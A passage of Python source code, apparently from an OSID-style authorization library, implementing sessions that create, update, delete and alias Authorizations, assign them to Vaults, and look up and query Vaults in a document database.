record_types=authorization_record_types,
resource_id=resource_id,
function_id=function_id,
qualifier_id=qualifier_id,
catalog_id=self._catalog_id,
runtime=self._runtime,
proxy=self._proxy)
obj_form._for_update = False
self._forms[obj_form.get_id().get_identifier()] = not CREATED
return obj_form
@utilities.arguments_not_none
def get_authorization_form_for_create_for_resource_and_trust(self, resource_id, trust_id, function_id, qualifier_id, authorization_record_types):
"""Gets the authorization form for creating new authorizations.
A new form should be requested for each create transaction.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: trust_id (osid.id.Id): an ``Id`` for a circle of trust
arg: function_id (osid.id.Id): a function ``Id``
arg: qualifier_id (osid.id.Id): the qualifier ``Id``
arg: authorization_record_types (osid.type.Type[]): array of
authorization record types
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``resource_id, trust_id, function_id`` , or
``qualifierid`` is not found
raise: NullArgument - ``resource_id, trust_id`` ,
``resource_id, qualifier_id`` or
``authorization_record_types`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def create_authorization(self, authorization_form):
"""Creates a new explicit ``Authorization``.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization form
return: (osid.authorization.Authorization) - ``t`` he new
``Authorization``
raise: IllegalState - ``authorization_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from this service
*compliance: mandatory -- This method must be implemented.*
"""
# TODO: not using the create_resource template
# because want to prevent duplicate authorizations
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('authorization_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
# try to check first here
try:
osid_map = collection.find_one({"agentId": authorization_form._my_map['agentId'],
"functionId": authorization_form._my_map['functionId'],
"qualifierId": authorization_form._my_map['qualifierId'],
"assignedVaultIds": authorization_form._my_map['assignedVaultIds']})
osid_map['startDate'] = authorization_form._my_map['startDate']
osid_map['endDate'] = authorization_form._my_map['endDate']
collection.save(osid_map)
except errors.NotFound:
insert_result = collection.insert_one(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = CREATED
osid_map = collection.find_one({'_id': insert_result.inserted_id})
result = objects.Authorization(
osid_object_map=osid_map,
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_authorizations(self):
"""Tests if this user can update ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
update operations to an unauthorized user.
return: (boolean) - ``false`` if authorization modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_update_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_form_for_update(self, authorization_id):
"""Gets the authorization form for updating an existing authorization.
A new authorization form should be requested for each update
transaction.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.authorization.AuthorizationForm) - the
authorization form
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_update_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
if (authorization_id.get_identifier_namespace() != 'authorization.Authorization' or
authorization_id.get_authority() != self._authority):
raise errors.InvalidArgument()
result = collection.find_one({'_id': ObjectId(authorization_id.get_identifier())})
obj_form = objects.AuthorizationForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[obj_form.get_id().get_identifier()] = not UPDATED
return obj_form
@utilities.arguments_not_none
def update_authorization(self, authorization_form):
"""Updates an existing authorization.
arg: authorization_form
(osid.authorization.AuthorizationForm): the
authorization ``Id``
raise: IllegalState - ``authorization_form`` already used in an
update transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``authorization_form`` is ``null``
raise: OperationFailed - ``unable to complete request``
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_form`` did not originate
from ``get_authorization_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.update_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_form, ABCAuthorizationForm):
raise errors.InvalidArgument('argument type is not an AuthorizationForm')
if not authorization_form.is_for_update():
raise errors.InvalidArgument('the AuthorizationForm is for update only, not create')
try:
if self._forms[authorization_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('authorization_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('authorization_form did not originate from this session')
if not authorization_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(authorization_form._my_map)
self._forms[authorization_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned:
return objects.Authorization(
osid_object_map=authorization_form._my_map,
runtime=self._runtime,
proxy=self._proxy)
def can_delete_authorizations(self):
"""Tests if this user can delete ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting an
``Authorization`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
delete operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` deletion is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_delete_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def delete_authorization(self, authorization_id):
"""Deletes the ``Authorization`` identified by the given ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to delete
raise: NotFound - an ``Authorization`` was not found identified
by the given ``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.delete_resource_template
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
if not isinstance(authorization_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
authorization_map = collection.find_one(
dict({'_id': ObjectId(authorization_id.get_identifier())},
**self._view_filter()))
objects.Authorization(osid_object_map=authorization_map, runtime=self._runtime, proxy=self._proxy)._delete()
collection.delete_one({'_id': ObjectId(authorization_id.get_identifier())})
def can_manage_authorization_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Authorizations``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Authorization`` aliasing is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_authorization(self, authorization_id, alias_id):
"""Adds an ``Id`` to an ``Authorization`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Authorization`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another authorization. it
is reassigned to the given authorization ``Id``.
arg: authorization_id (osid.id.Id): the ``Id`` of an
``Authorization``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``authorization_id`` not found
raise: NullArgument - ``authorization_id`` or ``alias_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.alias_resources_template
self._alias_id(primary_id=authorization_id, equivalent_id=alias_id)
class AuthorizationVaultSession(abc_authorization_sessions.AuthorizationVaultSession, osid_sessions.OsidSession):
"""This session provides methods to retrieve ``Authorization`` to ``Vault`` mappings.
An ``Authorization`` may appear in multiple ``Vaults``. Each
``Vault`` may have its own authorizations governing who is allowed
to look at it.
This lookup session defines several views:
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete result set or is an error
condition
"""
_session_namespace = 'authorization.AuthorizationVaultSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Authorization`` and ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def can_lookup_authorization_vault_mappings(self):
"""Tests if this user can perform lookups of authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known lookup methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
lookup operations to unauthorized users.
return: (boolean) - ``false`` if looking up mappings is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_authorization_ids_by_vault(self, vault_id):
"""Gets the list of ``Authorization`` ``Ids`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.id.IdList) - list of related authorization ``Ids``
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_id):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_id):
"""Gets the list of ``Authorizations`` associated with a ``Vault``.
arg: vault_id (osid.id.Id): ``Id`` of a ``Vault``
return: (osid.authorization.AuthorizationList) - list of related
authorization
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_authorizations_ids_by_vault(self, vault_ids):
"""Gets the list of ``Authorization Ids`` corresponding to a list of ``Vault`` objects.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.id.IdList) - list of authorization ``Ids``
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
id_list = []
for authorization in self.get_authorizations_by_vault(vault_ids):
id_list.append(authorization.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_authorizations_by_vault(self, vault_ids):
"""Gets the list of ``Authorizations`` corresponding to a list of ``Vault``.
arg: vault_ids (osid.id.IdList): list of vault ``Ids``
return: (osid.authorization.AuthorizationList) - list of
authorizations
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_resources_by_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session_for_vault(vault_ids, proxy=self._proxy)
lookup_session.use_isolated_vault_view()
return lookup_session.get_authorizations()
@utilities.arguments_not_none
def get_vault_ids_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` ``Ids`` mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.id.IdList) - list of vault ``Ids``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_authorization_lookup_session(proxy=self._proxy)
lookup_session.use_federated_vault_view()
authorization = lookup_session.get_authorization(authorization_id)
id_list = []
for idstr in authorization._my_map['assignedVaultIds']:
id_list.append(Id(idstr))
return IdList(id_list)
@utilities.arguments_not_none
def get_vault_by_authorization(self, authorization_id):
"""Gets the list of ``Vault`` objects mapped to an ``Authorization``.
arg: authorization_id (osid.id.Id): ``Id`` of an
``Authorization``
return: (osid.authorization.VaultList) - list of vault
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class AuthorizationVaultAssignmentSession(abc_authorization_sessions.AuthorizationVaultAssignmentSession, osid_sessions.OsidSession):
"""This session provides methods to re-assign ``Authorizations`` to ``Vault``.
An ``Authorization`` may map to multiple ``Vault`` objects and
removing the last reference to a ``Authorization`` is the equivalent
of deleting it. Each ``Vault`` may have its own authorizations
governing who is allowed to operate on it.
Moving or adding a reference of a ``Authorization`` to another
``Vault`` is not a copy operation (eg: does not change its ``Id`` ).
"""
_session_namespace = 'authorization.AuthorizationVaultAssignmentSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession._init_catalog(self, proxy, runtime)
self._catalog_name = 'Vault'
self._forms = dict()
self._kwargs = kwargs
def can_assign_authorizations(self):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def can_assign_authorizations_to_vault(self, vault_id):
"""Tests if this user can alter authorization/vault mappings.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known mapping methods in
this session will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
assignment operations to unauthorized users.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (boolean) - ``false`` if mapping is not authorized,
``true`` otherwise
raise: NullArgument - ``vault_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if vault_id.get_identifier() == '000000000000000000000000':
return False
return True
@utilities.arguments_not_none
def get_assignable_vault_ids(self, vault_id):
"""Gets a list of vault including and under the given vault node in which any authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
# This will likely be overridden by an authorization adapter
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
vaults = lookup_session.get_vaults()
id_list = []
for vault in vaults:
id_list.append(vault.get_id())
return IdList(id_list)
@utilities.arguments_not_none
def get_assignable_vault_ids_for_authorization(self, vault_id, authorization_id):
"""Gets a list of vault including and under the given vault node in which a specific authorization can be assigned.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
return: (osid.id.IdList) - list of assignable vault ``Ids``
raise: NullArgument - ``vault_id`` or ``authorization_id`` is
``null``
raise: OperationFailed - unable to complete request
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
# This will likely be overridden by an authorization adapter
return self.get_assignable_vault_ids(vault_id)
@utilities.arguments_not_none
def assign_authorization_to_vault(self, authorization_id, vault_id):
"""Adds an existing ``Authorization`` to a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: AlreadyExists - ``authorization_id`` is already assigned
to ``vault_id``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._assign_object_to_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def unassign_authorization_from_vault(self, authorization_id, vault_id):
"""Removes an ``Authorization`` from a ``Vault``.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
raise: NotFound - ``authorization_id`` or ``vault_id`` not
found or ``authorization_id`` not assigned to
``vault_id``
raise: NullArgument - ``authorization_id`` or ``vault_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.unassign_resource_from_bin
mgr = self._get_provider_manager('AUTHORIZATION', local=True)
lookup_session = mgr.get_vault_lookup_session(proxy=self._proxy)
lookup_session.get_vault(vault_id) # to raise NotFound
self._unassign_object_from_catalog(authorization_id, vault_id)
@utilities.arguments_not_none
def reassign_authorization_to_vault(self, authorization_id, from_vault_id, to_vault_id):
"""Moves an ``Authorization`` from one ``Vault`` to another.
Mappings to other ``Vaults`` are unaffected.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization``
arg: from_vault_id (osid.id.Id): the ``Id`` of the current
``Vault``
arg: to_vault_id (osid.id.Id): the ``Id`` of the destination
``Vault``
raise: NotFound - ``authorization_id, from_vault_id,`` or
``to_vault_id`` not found or ``authorization_id`` not
mapped to ``from_vault_id``
raise: NullArgument - ``authorization_id, from_vault_id,`` or
``to_vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceBinAssignmentSession.reassign_resource_to_bin
self.assign_authorization_to_vault(authorization_id, to_vault_id)
try:
self.unassign_authorization_from_vault(authorization_id, from_vault_id)
except: # something went wrong, roll back assignment to to_vault_id
self.unassign_authorization_from_vault(authorization_id, to_vault_id)
raise
class VaultLookupSession(abc_authorization_sessions.VaultLookupSession, osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Vault`` objects.
The ``Vault`` represents a collection of ``Functions`` and
``Authorizations``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete set or is an error condition
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Vaults`` it can access, without breaking execution.
However, an administrative application may require all ``Vault``
elements to be available.
Vaults may have an additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Vault``.
"""
_session_namespace = 'authorization.VaultLookupSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_lookup_session()
self._catalog_session.use_comparative_catalog_view()
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def can_lookup_vaults(self):
"""Tests if this user can perform ``Vault`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.can_lookup_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_lookup_catalogs()
return True
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
@utilities.arguments_not_none
def get_vault(self, vault_id):
"""Gets the ``Vault`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Vault`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to a ``Vault`` and retained for compatibility.
arg: vault_id (osid.id.Id): ``Id`` of the ``Vault``
return: (osid.authorization.Vault) - the vault
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bin
if self._catalog_session is not None:
return self._catalog_session.get_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
# Need to consider how to best deal with the "phantom root" catalog issue
if vault_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:
return self._get_phantom_root_catalog(cat_class=objects.Vault, cat_name='Vault')
try:
result = collection.find_one({'_id': ObjectId(self._get_id(vault_id, 'authorization').get_identifier())})
except errors.NotFound:
# Try creating an orchestrated Vault. Let it raise errors.NotFound()
result = self._create_orchestrated_cat(vault_id, 'authorization', 'Vault')
return objects.Vault(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_ids(self, vault_ids):
"""Gets a ``VaultList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the vaults
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Vault`` objects may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: vault_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_by_ids_template
# NOTE: This implementation currently ignores plenary view
# Also, this should be implemented to use get_Vault() instead of direct to database
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_ids(catalog_ids=vault_ids)
catalog_id_list = []
for i in vault_ids:
catalog_id_list.append(ObjectId(i.get_identifier()))
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'_id': {'$in': catalog_id_list}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` which does not include vaults of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'genusTypeId': {'$in': [str(vault_genus_type)]}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_vaults_by_parent_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` and include any additional vaults with genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_record_type(self, vault_record_type):
"""Gets a ``VaultList`` containing the given vault record ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_record_type (osid.type.Type): a vault record type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_provider(self, resource_id):
"""Gets a ``VaultList`` from the given provider ````.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_vaults(self):
"""Gets all ``Vaults``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
return: (osid.authorization.VaultList) - a ``VaultList``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_template
# NOTE: This implementation currently ignores plenary view
if self._catalog_session is not None:
return self._catalog_session.get_catalogs()
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find().sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
vaults = property(fget=get_vaults)
class VaultQuerySession(abc_authorization_sessions.VaultQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching among ``Vault`` objects.
The search query is constructed using the ``VaultQuery``.
Vaults may have a query record indicated by their respective record
types. The query record is accessed via the ``VaultQuery``.
"""
_session_namespace = 'authorization.VaultQuerySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_query_session()
self._forms = dict()
self._kwargs = kwargs
def can_search_vaults(self):
"""Tests if this user can perform ``Vault`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.can_search_bins_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def get_vault_query(self):
"""Gets a vault query.
return: (osid.authorization.VaultQuery) - a vault query
